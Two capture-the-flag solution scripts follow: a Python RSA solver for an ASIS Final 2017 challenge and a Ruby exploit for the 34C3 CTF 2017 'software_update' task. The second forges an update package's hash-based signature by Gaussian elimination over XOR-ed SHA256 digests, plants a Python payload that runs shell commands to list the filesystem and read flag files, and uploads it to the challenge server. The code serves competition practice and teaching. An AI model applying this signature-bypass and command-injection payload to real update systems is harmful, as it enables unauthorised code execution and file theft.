File: asis-final-2017/enrage_me/solve.py
#!/usr/bin/env python2

import gmpy
from pwn import *
n = 1408906108648127120822775586604952148832266454357812435140055286169381709951576947121
p = 1184768967212473512123668136883340418843347 
q = 1189182150814604694726460475579427891025643
e = 65537
assert n == p * q

r = (p-1) * (q-1)
d = gmpy.invert(e,  r)

plain = 12345
assert pow(pow(plain, e, n), d, n) == plain

ary = [149, 127, 168, 106, 108, 204, 18, 138, 104, 46, 127, 243, 16, 217, 250, 242, 168, 166, 95, 213, 238, 196, 69, None, 181, 116, 219, 18, 3, 168, 134, 54, 130, 30, 252]
for i in range(256):
    ary[23] = i
    v = 1
    s = 0
    for c in range(len(ary)):
        s = s * 256 + ary[c]
    t = (hex(pow(s, d, n))[2:])
    if len(t) % 2 == 1:
        t = '0' + t
    print(repr(t.decode('hex')))
# ASIS{RsA_1s_Aw3s0m3_AnD_S0_1s_V3X!}

File: 34c3ctf-2017/software_update/solution/solve.rb
#!/usr/bin/env ruby
# encoding: ascii-8bit

require 'base64'
require 'digest'
require 'pwn'
require 'securerandom'

# send remote
if ARGV.include? 'r'
  z = Sock.new('35.198.64.68', 2023)
  z.recvuntil("Proof of work challenge: ")
  chal = z.gets.strip
  z.puts `../pow.py #{chal}`.lines.map(&:strip).reject(&:empty?).last.split.last
  z.puts Base64.encode64(IO.binread('upload.zip')).split.join
  z.interact
  exit
end

# generate zip

# target check sum
tar = "E\x8b\x9f\xa25\x86zo\xae\n+\xc5\xb5\x14ebd(\xe6\xd2\xfam\xe98i\xa3\x8aVzG\x87u"

# what we need is generating strings that xor sha256 of them equals to `tar`

def xor(a, b)
  a.bytes.zip(b.bytes).map{|c,d|c^d}.pack("C*")
end

`rm -r tmp2; mkdir tmp2; mkdir tmp2/signed_data; cp signature.bin tmp2/`

py = <<-EOS
import os
os.system('pwd;ls -la /; cat /home/`whoami`/*flag*; cat /flag*')
EOS

IO.binwrite('tmp2/signed_data/pre-copy.py', py)
hash = Digest::SHA256.digest("pre-copy.py" + "\x00" + py)
tar = xor(tar, hash)

def to_in(s)
  s.bytes.map.with_index{ |v,i| v << (i * 8) }.sum
end

def gen(tar, files)
  tar = to_in(tar)
  files = files.map { |f| to_in(Digest::SHA256.digest(f+"\x00")) }
  Array.new(256) do |i|
    val = 0
    256.times do |j|
      val |= files[j][i] << j
    end
    val |= tar[i] << 256
  end
end

# do Gaussian elimination
def gauss(ary)
  ary.size.times do |i|
    piv = (i...ary.size).find { |j| ary[j][i] == 1 }
    next if piv.nil?
    ary[i], ary[piv] = ary[piv], ary[i]
    (0...ary.size).each do |j|
      next if i == j || ary[j][i] == 0
      ary[j] ^= ary[i]
    end
  end
  ary.size.times.select { |i| print ary[i][i]; ary[i][256] == 1 }
end

# random 256 values have high prob. to be linear independent
files = Array.new(256) { SecureRandom.hex(16) }
ary = gen(tar, files)
indexes = gauss(ary)
puts ''
zz = "\x00" * 32
indexes.each do |c|
  zz = xor(zz, Digest::SHA256.digest(files[c] + "\x00"))
  `touch tmp2/signed_data/#{files[c]}`
end
p tar == zz
p xor(zz, hash)
`rm upload.zip; cd tmp2; zip -r ../upload.zip .`

# 34C4_if_you_have_a_clever_idea_for_this_flag_let_us_know_in_IRC
